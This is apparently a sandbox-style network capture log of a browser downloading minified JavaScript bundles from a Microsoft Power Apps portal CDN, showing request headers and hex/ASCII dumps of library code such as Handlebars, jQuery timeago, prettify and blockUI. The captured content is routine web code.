2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 61 73 65 20 33 38 3a 74 68 69 73 2e 24 3d 7b 74 79 70 65 3a 22 55 6e 64 65 66 69 6e 65 64 4c 69 74 65 72 61 6c 22 2c 6f 72 69 67 69 6e 61 6c 3a 75 6e 64 65 66 69 6e 65 64 2c 76 61 6c 75 65 3a 75 6e 64 65 66 69 6e 65 64 2c 6c 6f 63 3a 69 2e 6c 6f 63 49 6e 66 6f 28 74 68 69 73 2e 5f 24 29 7d 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 68 69 73 2e 24 3d 7b 74 79 70 65 3a 22 4e 75 6c 6c 4c 69 74 65 72 61 6c 22 2c 6f 72 69 67 69 6e 61 6c 3a 6e 75 6c 6c 2c 76 61 6c 75 65 3a 6e 75 6c 6c 2c 6c 6f 63 3a 69 2e 6c 6f 63 49 6e 66 6f 28 74 68 69 73 2e 5f 24 29 7d 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 30 3a 74 68 69 73 2e 24 3d 73 5b 75 5d 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 31 3a 74 68 69 73 2e 24 3d 73 5b 75 5d 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 32 3a 74 Data Ascii: ase 38:this.$={type:"UndefinedLiteral",original:undefined,value:undefined,loc:i.locInfo(this._$)};break;case 39:this.$={type:"NullLiteral",original:null,value:null,loc:i.locInfo(this._$)};break;case 40:this.$=s[u];break;case 41:this.$=s[u];break;case 42:t
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 6d 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 5f 6d 6f 72 65 3d 74 72 75 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 6c 65 73 73 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 74 68 69 73 2e 75 6e 70 75 74 28 74 68 69 73 2e 6d 61 74 63 68 2e 73 6c 69 63 65 28 74 29 29 7d 2c 70 61 73 74 49 6e 70 75 74 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6d 61 74 63 68 65 64 2e 73 75 62 73 74 72 28 30 2c 74 68 69 73 2e 6d 61 74 63 68 65 64 2e 6c 65 6e 67 74 68 2d 74 68 69 73 2e 6d 61 74 63 68 2e 6c 65 6e 67 74 68 29 3b 72 65 74 75 72 6e 28 74 2e 6c 65 6e 67 74 68 3e 32 30 3f 22 2e 2e 2e 22 3a 22 22 29 2b 74 2e 73 75 62 73 74 72 28 2d 32 30 29 2e 72 65 70 6c 61 63 65 28 2f 5c Data Ascii: return this},more:function e(){this._more=true;return this},less:function e(t){this.unput(this.match.slice(t))},pastInput:function e(){var t=this.matched.substr(0,this.matched.length-this.match.length);return(t.length>20?"...":"")+t.substr(-20).replace(/\
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 2c 61 2e 6f 72 69 67 69 6e 61 6c 2c 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 68 65 6c 70 65 72 73 2e 73 69 6d 70 6c 65 49 64 28 61 29 29 7d 7d 2c 50 61 74 68 45 78 70 72 65 73 73 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 74 68 69 73 2e 61 64 64 44 65 70 74 68 28 74 2e 64 65 70 74 68 29 3b 74 68 69 73 2e 6f 70 63 6f 64 65 28 22 67 65 74 43 6f 6e 74 65 78 74 22 2c 74 2e 64 65 70 74 68 29 3b 76 61 72 20 72 3d 74 2e 70 61 72 74 73 5b 30 5d 2c 6e 3d 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 68 65 6c 70 65 72 73 2e 73 63 6f 70 65 64 49 64 28 74 29 2c 69 3d 21 74 2e 64 65 70 74 68 26 26 21 6e 26 26 74 68 69 73 2e 62 6c 6f 63 6b 50 61 72 61 6d 49 6e 64 65 78 28 72 29 3b 69 66 28 69 29 7b 74 68 69 73 2e 6f 70 63 6f 64 65 28 22 6c 6f 6f 6b 75 70 42 6c 6f 63 Data Ascii: ,a.original,c["default"].helpers.simpleId(a))}},PathExpression:function e(t){this.addDepth(t.depth);this.opcode("getContext",t.depth);var r=t.parts[0],n=c["default"].helpers.scopedId(t),i=!t.depth&&!n&&this.blockParamIndex(r);if(i){this.opcode("lookupBloc
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 70 53 74 61 63 6b 28 29 7d 69 66 28 69 29 7b 74 68 69 73 2e 73 74 61 63 6b 53 6c 6f 74 2d 2d 7d 74 68 69 73 2e 70 75 73 68 28 72 2e 63 6f 6e 63 61 74 28 75 2c 22 29 22 29 29 7d 2c 69 6e 63 72 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 73 74 61 63 6b 53 6c 6f 74 2b 2b 3b 69 66 28 74 68 69 73 2e 73 74 61 63 6b 53 6c 6f 74 3e 74 68 69 73 2e 73 74 61 63 6b 56 61 72 73 2e 6c 65 6e 67 74 68 29 7b 74 68 69 73 2e 73 74 61 63 6b 56 61 72 73 2e 70 75 73 68 28 22 73 74 61 63 6b 22 2b 74 68 69 73 2e 73 74 61 63 6b 53 6c 6f 74 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 74 6f 70 53 74 61 63 6b 4e 61 6d 65 28 29 7d 2c 74 6f 70 53 74 61 63 6b 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 22 73 74 61 63 6b 22 2b 74 68 Data Ascii: pStack()}if(i){this.stackSlot--}this.push(r.concat(u,")"))},incrStack:function e(){this.stackSlot++;if(this.stackSlot>this.stackVars.length){this.stackVars.push("stack"+this.stackSlot)}return this.topStackName()},topStackName:function e(){return"stack"+th
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 61 73 65 22 6d 6d 22 3a 72 65 74 75 72 6e 20 69 28 74 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 29 3b 63 61 73 65 22 6d 22 3a 72 65 74 75 72 6e 20 74 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 3b 63 61 73 65 22 73 73 22 3a 72 65 74 75 72 6e 20 69 28 74 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 29 3b 63 61 73 65 22 73 22 3a 72 65 74 75 72 6e 20 74 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 3b 63 61 73 65 22 79 79 79 79 22 3a 72 65 74 75 72 6e 20 69 28 74 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 34 29 3b 63 61 73 65 22 79 79 22 3a 72 65 74 75 72 6e 20 69 28 74 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 29 3b 63 61 73 65 22 64 64 64 64 22 3a 72 65 74 75 72 6e 20 73 2e 64 61 79 4e 61 6d 65 73 5b 74 2e 67 65 74 44 61 79 28 29 5d 3b 63 61 73 65 22 64 64 64 22 3a 72 65 74 Data Ascii: ase"mm":return i(t.getMinutes());case"m":return t.getMinutes();case"ss":return i(t.getSeconds());case"s":return t.getSeconds();case"yyyy":return i(t.getFullYear(),4);case"yy":return i(t.getFullYear());case"dddd":return s.dayNames[t.getDay()];case"ddd":ret
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 72 6e 20 6f 2e 70 72 6f 63 65 73 73 28 6f 2e 65 61 63 68 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 65 29 2c 74 2e 66 69 6e 69 73 68 45 78 61 63 74 29 7d 29 3b 76 61 72 20 69 3d 7b 7d 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 5b 65 5d 3d 69 5b 65 5d 7c 7c 72 2e 66 6f 72 6d 61 74 28 65 29 5b 30 5d 7d 3b 72 2e 66 6f 72 6d 61 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 7b 76 61 72 20 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 74 2e 70 75 73 68 28 61 28 65 5b 72 5d 29 29 7d 72 65 74 75 72 6e 20 6f 2e 61 6e 79 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 61 28 65 29 7d 7d Data Ascii: rn o.process(o.each.apply(null,e),t.finishExact)});var i={};var a=function(e){return i[e]=i[e]\|\|r.format(e)[0]};r.formats=function(e){if(e instanceof Array){var t=[];for(var r=0;r<e.length;r++){t.push(a(e[r]))}return o.any.apply(null,t)}else{return a(e)}}
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 75 29 7b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 50 52 5f 53 48 4f 55 4c 44 5f 55 53 45 5f 43 4f 4e 54 49 4e 55 41 54 49 4f 4e 3f 68 2e 6e 6f 77 28 29 2b 32 35 30 3a 49 6e 66 69 6e 69 74 79 3b 66 3c 63 2e 6c 65 6e 67 74 68 26 26 68 2e 6e 6f 77 28 29 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 74 3d 63 5b 66 5d 2c 72 3d 74 2e 63 6c 61 73 73 4e 61 6d 65 3b 69 66 28 72 2e 69 6e 64 65 78 4f 66 28 22 70 72 65 74 74 79 70 72 69 6e 74 22 29 3e 3d 30 29 7b 76 61 72 20 72 3d 72 2e 6d 61 74 63 68 28 64 29 2c 6e 2c 69 3b 69 66 28 69 3d 21 72 29 7b 69 3d 74 3b 66 6f 72 28 76 61 72 20 61 3d 76 6f 69 64 20 30 2c 73 3d 69 2e 66 69 72 73 74 43 68 69 6c 64 3b 73 3b 73 3d 73 2e 6e 65 78 74 53 69 62 6c Data Ascii: =function(u){function l(){for(var e=window.PR_SHOULD_USE_CONTINUATION?h.now()+250:Infinity;f<c.length&&h.now()<e;f++){var t=c[f],r=t.className;if(r.indexOf("prettyprint")>=0){var r=r.match(d),n,i;if(i=!r){i=t;for(var a=void 0,s=i.firstChild;s;s=s.nextSibl
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 72 20 73 3b 69 66 28 72 29 73 3d 5f 28 22 62 6f 64 79 22 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 6c 74 65 72 28 22 2e 62 6c 6f 63 6b 55 49 22 29 2e 61 64 64 28 22 62 6f 64 79 20 3e 20 2e 62 6c 6f 63 6b 55 49 22 29 3b 65 6c 73 65 20 73 3d 6e 2e 66 69 6e 64 28 22 3e 2e 62 6c 6f 63 6b 55 49 22 29 3b 69 66 28 74 2e 63 75 72 73 6f 72 52 65 73 65 74 29 7b 69 66 28 73 2e 6c 65 6e 67 74 68 3e 31 29 73 5b 31 5d 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 2e 63 75 72 73 6f 72 52 65 73 65 74 3b 69 66 28 73 2e 6c 65 6e 67 74 68 3e 32 29 73 5b 32 5d 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 2e 63 75 72 73 6f 72 52 65 73 65 74 7d 69 66 28 72 29 54 3d 43 3d 6e 75 6c 6c 3b 69 66 28 74 2e 66 61 64 65 4f 75 74 29 7b 73 2e 66 61 64 65 4f 75 74 28 74 2e 66 61 64 65 Data Ascii: r s;if(r)s=_("body").children().filter(".blockUI").add("body > .blockUI");else s=n.find(">.blockUI");if(t.cursorReset){if(s.length>1)s[1].style.cursor=t.cursorReset;if(s.length>2)s[2].style.cursor=t.cursorReset}if(r)T=C=null;if(t.fadeOut){s.fadeOut(t.fade

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	422	OUT	GET /resource/powerappsportal/dist/default-1033.moment_2_29_4.bundle-eda4e638fd.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:01 UTC	801	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:01 GMT Content-Type: application/x-javascript Content-Length: 361 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000C8 x-ms-static-content: NR0000027 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: ff068fa3-5422-4bba-9b93-12b72695b61c x-ms-correlation-id: d1c501a2-ddd4-4d5b-9636-4a83387beff6 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=33.7,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141201Z-17f859c6f6bwlwgzhC1MNZacd400000001c0000000001uby X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:01 UTC	361	IN	Data Raw: 6a 51 75 65 72 79 2e 74 69 6d 65 61 67 6f 2e 73 65 74 74 69 6e 67 73 2e 73 74 72 69 6e 67 73 3d 7b 70 72 65 66 69 78 41 67 6f 3a 6e 75 6c 6c 2c 70 72 65 66 69 78 46 72 6f 6d 4e 6f 77 3a 6e 75 6c 6c 2c 73 75 66 66 69 78 41 67 6f 3a 22 61 67 6f 22 2c 73 75 66 66 69 78 46 72 6f 6d 4e 6f 77 3a 22 66 72 6f 6d 20 6e 6f 77 22 2c 73 65 63 6f 6e 64 73 3a 22 6c 65 73 73 20 74 68 61 6e 20 61 20 6d 69 6e 75 74 65 22 2c 6d 69 6e 75 74 65 3a 22 61 62 6f 75 74 20 61 20 6d 69 6e 75 74 65 22 2c 6d 69 6e 75 74 65 73 3a 22 25 64 20 6d 69 6e 75 74 65 73 22 2c 68 6f 75 72 3a 22 61 62 6f 75 74 20 61 6e 20 68 6f 75 72 22 2c 68 6f 75 72 73 3a 22 61 62 6f 75 74 20 25 64 20 68 6f 75 72 73 22 2c 64 61 79 3a 22 61 20 64 61 79 22 2c 64 61 79 73 3a 22 25 64 20 64 61 79 73 22 2c 6d 6f Data Ascii: jQuery.timeago.settings.strings={prefixAgo:null,prefixFromNow:null,suffixAgo:"ago",suffixFromNow:"from now",seconds:"less than a minute",minute:"about a minute",minutes:"%d minutes",hour:"about an hour",hours:"about %d hours",day:"a day",days:"%d days",mo

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:01 UTC	408	OUT	GET /resource/powerappsportal/controls/host/main.04a618205e.chunk.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:01 UTC	851	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:01 GMT Content-Type: application/x-javascript Content-Length: 8612 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: ga00000JW x-ms-static-content: ZE00000B6 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 6bf7aedd-ab0e-445c-b430-bbc7960fcea0 x-ms-correlation-id: 5ccd26dc-d75a-4d27-b90d-cd13a79797bb x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=6.9,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141201Z-17f859c6f6b8nggxhC1MNZ3kun000000012g000000001y85 X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:01 UTC	8612	IN	Data Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 72 2c 6f 2c 6e 2c 61 2c 69 2c 6c 2c 66 2c 75 2c 63 2c 73 2c 64 2c 68 2c 70 2c 76 2c 6d 2c 67 2c 62 2c 79 2c 77 2c 50 3d 7b 37 37 39 37 3a 28 65 2c 74 2c 72 29 3d 3e 7b 0a 2f 2a 21 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 2f 0a 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 72 2e 65 28 34 34 38 29 2c 72 2e 65 28 35 35 39 29 2c 72 2e 65 28 34 31 29 2c 72 2e 65 28 38 32 29 2c 72 2e 65 28 36 34 36 29 2c 72 2e 65 28 33 34 39 29 5d 29 2e 74 68 65 6e 28 72 2e 62 69 6e 64 28 72 2c 34 32 31 30 29 29 7d 7d 2c 6a 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 76 61 72 20 74 3d Data Ascii: (()=>{var e,t,r,o,n,a,i,l,f,u,c,s,d,h,p,v,m,g,b,y,w,P={7797:(e,t,r)=>{/! Copyright (C) Microsoft Corporation. All rights reserved. */Promise.all([r.e(448),r.e(559),r.e(41),r.e(82),r.e(646),r.e(349)]).then(r.bind(r,4210))}},j={};function O(e){var t=

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:01 UTC	411	OUT	GET /resource/powerappsportal/dist/app.BootstrapV5.bundle-3c181c74ce.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:01 UTC	827	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:01 GMT Content-Type: application/x-javascript Content-Length: 278783 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: ga000006N x-ms-static-content: PI0000007 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: b4661a27-721a-499f-9064-8ca846e80c09 x-ms-correlation-id: 9a0321b3-59b6-406e-b2aa-1f132a90b5c5 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=62.5,x-ms-igw-req-overhead;dur=0.4 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141201Z-17f859c6f6b885jdhC1MNZu0zw00000000sg0000000048tv X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:01 UTC	15557	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 77 28 65 29 3b 74 68 69 73 2e 5f 74 61 72 67 65 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 62 73 54 61 72 67 65 74 22 29 7c 7c 7b 7d 3b 74 68 69 73 2e 5f 61 74 74 61 63 68 6d 65 6e 74 53 65 74 74 69 6e 67 73 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 61 74 74 61 63 68 6d 65 6e 74 73 65 74 74 69 6e 67 73 22 29 3b 74 68 69 73 2e 5f 73 65 72 76 69 63 65 55 72 6c 47 65 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 64 61 74 61 2d 75 72 6c 2d 67 65 74 22 29 3b 74 68 69 73 2e 5f 73 65 72 76 69 63 65 55 72 6c 41 64 64 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 Data Ascii: (function(w){function c(e){this._element=w(e);this._target=this._element.data("bsTarget")\|\|{};this._attachmentSettings=this._element.data("attachmentsettings");this._serviceUrlGet=this._element.attr("data-url-get");this._serviceUrlAdd=this._element.attr("
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 67 65 72 5b 22 52 65 71 75 69 72 65 64 5f 46 69 65 6c 64 5f 45 72 72 6f 72 22 5d 2e 72 65 70 6c 61 63 65 28 22 7b 30 7d 22 2c 66 2e 74 65 78 74 28 29 29 7d 3b 67 28 75 2c 6e 29 7d 72 65 74 75 72 6e 7d 76 61 72 20 70 3d 6e 2e 66 69 6e 64 28 22 69 6e 70 75 74 5b 74 79 70 65 3d 27 63 68 65 63 6b 62 6f 78 27 5d 22 29 3b 69 66 28 70 2e 6c 65 6e 67 74 68 3e 30 29 7b 6c 3d 70 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 29 7d 76 61 72 20 76 3d 6e 2e 66 69 6e 64 28 22 69 6e 70 75 74 5b 74 79 70 65 3d 27 66 69 6c 65 27 5d 22 29 3b 69 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 29 2e 70 72 65 70 65 6e 64 28 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 66 61 20 66 61 2d 73 70 69 6e 6e 65 72 20 66 61 2d 73 70 69 6e 27 20 61 72 69 61 Data Ascii: ger["Required_Field_Error"].replace("{0}",f.text())};g(u,n)}return}var p=n.find("input[type='checkbox']");if(p.length>0){l=p.prop("checked")}var v=n.find("input[type='file']");i.attr("disabled","disabled").prepend("<span class='fa fa-spinner fa-spin' aria
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 61 2d 73 70 69 6e 22 29 2e 72 65 6d 6f 76 65 28 29 7d 29 7d 29 3b 73 2e 6d 6f 64 61 6c 28 22 73 68 6f 77 22 29 7d 29 7d 65 6c 73 65 7b 74 2e 66 69 6e 64 28 22 2e 71 75 61 6c 69 66 79 2d 6c 65 61 64 2d 6c 69 6e 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 74 3d 64 2e 66 69 6e 64 28 22 5b 69 64 24 3d 27 5f 45 6e 74 69 74 79 49 44 27 5d 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 61 3d 67 28 74 68 69 73 29 2e 64 61 74 61 28 22 75 72 6c 22 29 3b 76 61 72 20 6e 3d 7b 7d 3b 6e 2e 63 72 65 61 74 65 41 63 63 6f 75 6e 74 3d 74 72 75 65 3b 6e 2e 63 72 65 61 74 65 43 6f 6e 74 61 63 74 3d 74 72 75 65 3b 6e 2e 63 72 65 61 74 65 4f 70 70 6f 72 74 75 6e 69 74 79 3d 74 72 Data Ascii: a-spin").remove()})});s.modal("show")})}else{t.find(".qualify-lead-link").on("click",function(e){e.preventDefault();var t=d.find("[id$='_EntityID']").val();var a=g(this).data("url");var n={};n.createAccount=true;n.createContact=true;n.createOpportunity=tr
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 65 29 2e 66 69 6e 64 28 22 2e 66 61 2d 73 70 69 6e 22 29 2e 72 65 6d 6f 76 65 28 29 7d 29 7d 29 3b 73 2e 6d 6f 64 61 6c 28 22 73 68 6f 77 22 29 7d 29 7d 65 6c 73 65 7b 74 2e 66 69 6e 64 28 22 2e 61 63 74 69 76 61 74 65 2d 6c 69 6e 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 74 3d 64 2e 66 69 6e 64 28 22 5b 69 64 24 3d 27 5f 45 6e 74 69 74 79 49 44 27 5d 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 61 3d 67 28 74 68 69 73 29 2e 64 61 74 61 28 22 75 72 6c 22 29 3b 76 61 72 20 6e 3d 7b 7d 3b 76 61 72 20 69 3d 7b 7d 3b 69 2e 4c 6f 67 69 63 61 6c 4e 61 6d 65 3d 6c 2e 45 6e 74 69 74 79 4e 61 6d 65 3b 69 2e 49 64 3d 74 3b 6e 2e 65 6e 74 69 74 79 52 65 66 65 72 65 Data Ascii: e).find(".fa-spin").remove()})});s.modal("show")})}else{t.find(".activate-link").on("click",function(e){e.preventDefault();var t=d.find("[id$='_EntityID']").val();var a=g(this).data("url");var n={};var i={};i.LogicalName=l.EntityName;i.Id=t;n.entityRefere
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 66 69 6e 64 28 22 2e 66 6f 72 6d 2d 6c 6f 61 64 69 6e 67 22 29 2e 68 69 64 65 28 29 3b 74 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2e 63 6f 6e 74 65 6e 74 73 28 29 2e 66 69 6e 64 28 22 23 45 6e 74 69 74 79 46 6f 72 6d 43 6f 6e 74 72 6f 6c 22 29 2e 73 68 6f 77 28 29 7d 29 3b 74 2e 66 69 6e 64 28 22 2e 66 6f 72 6d 2d 6c 6f 61 64 69 6e 67 22 29 2e 73 68 6f 77 28 29 3b 74 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2e 63 6f 6e 74 65 6e 74 73 28 29 2e 66 69 6e 64 28 22 23 45 6e 74 69 74 79 46 6f 72 6d 43 6f 6e 74 72 6f 6c 22 29 2e 68 69 64 65 28 29 3b 74 2e 6f 6e 28 22 68 69 64 65 2e 62 73 2e 6d 6f 64 61 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 28 74 68 69 73 29 2e 61 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 7d 29 Data Ascii: find(".form-loading").hide();t.find("iframe").contents().find("#EntityFormControl").show()});t.find(".form-loading").show();t.find("iframe").contents().find("#EntityFormControl").hide();t.on("hide.bs.modal",function(e){g(this).attr("aria-hidden","true")})
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 63 74 69 6f 6e 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 6f 2e 54 6f 6f 6c 74 69 70 29 2e 68 74 6d 6c 28 6f 2e 4c 61 62 65 6c 29 3b 69 66 28 68 2e 5f 63 6f 6d 70 61 63 74 29 7b 6d 2e 61 64 64 43 6c 61 73 73 28 22 62 74 6e 2d 73 6d 22 29 7d 6d 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6d 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 29 3d 3d 22 64 69 73 61 62 6c 65 64 22 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6d 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 29 3b 76 61 72 20 74 3d 6e 65 77 20 44 61 74 65 3b 76 61 72 20 61 2c 6e 3d 66 61 6c 73 65 3b 76 61 72 20 69 3d 7b 7d 3b 69 2e 76 69 65 77 4e 61 6d 65 3d 77 2e Data Ascii: ction").attr("title",o.Tooltip).html(o.Label);if(h._compact){m.addClass("btn-sm")}m.on("click",function(e){if(m.attr("disabled")=="disabled"){return false}e.preventDefault();m.attr("disabled","disabled");var t=new Date;var a,n=false;var i={};i.viewName=w.
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 20 73 3d 73 65 28 64 29 3b 69 66 28 21 73 29 7b 76 61 72 20 63 3d 4c 65 28 64 2e 41 74 74 72 69 62 75 74 65 73 2c 22 4e 61 6d 65 22 2c 6f 29 3b 69 66 28 63 21 3d 2d 31 29 7b 73 3d 64 2e 41 74 74 72 69 62 75 74 65 73 5b 63 5d 2e 44 69 73 70 6c 61 79 56 61 6c 75 65 7d 7d 76 61 72 20 66 3d 68 65 28 22 3c 74 72 3e 3c 2f 74 72 3e 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 69 64 22 2c 64 2e 49 64 29 2e 61 74 74 72 28 22 64 61 74 61 2d 65 6e 74 69 74 79 22 2c 61 65 2e 45 6e 74 69 74 79 4e 61 6d 65 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6e 61 6d 65 22 2c 73 7c 7c 22 22 29 2e 6f 6e 28 22 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 68 65 28 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 7d 29 2e 6f 6e 28 22 62 6c 75 72 22 2c 66 75 Data Ascii: s=se(d);if(!s){var c=Le(d.Attributes,"Name",o);if(c!=-1){s=d.Attributes[c].DisplayValue}}var 